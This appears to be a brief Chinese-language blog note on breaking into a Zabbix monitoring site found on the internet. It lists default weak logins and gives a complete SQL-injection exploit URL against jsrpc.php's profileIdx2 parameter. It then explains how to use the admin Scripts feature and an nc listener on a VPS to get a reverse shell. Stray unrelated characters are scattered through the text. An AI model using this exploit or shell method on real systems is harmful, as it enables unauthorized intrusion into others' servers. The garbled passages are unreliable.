在網(wǎng)上找了一個 Zabbix 站點(diǎn)進(jìn)行測試吁伺,
zabbix常用弱口令? admin / zabbix? 或者? guest 空口令
外面注入exp??http://0.0.0.0/jsrpc.php?type=9&method=screen.get×tamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,md5(0x11),1)+or+1=1)%23&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17
注入漏洞參數(shù):profileIdx2 外厂,可以用sqlmap 嘗試跑注入
---------------------------------------------------------------------------------------------------------------
利用口令登陸以后開始反彈shell
管理---腳本芒澜,在命令寫入反彈shell命令枫笛,在VPS開始nc監(jiān)聽
監(jiān)測---問題通今,隨便打開個主機(jī)找到剛剛創(chuàng)建的腳本往枣,就可以執(zhí)行反彈shell命令
VPS監(jiān)聽反彈shell
如果在 腳本命令里面輸入? whoami?? 在 監(jiān)測---問題,隨便選擇主機(jī)用爪,找到自己whoami的腳本原押,直接返回用戶信息。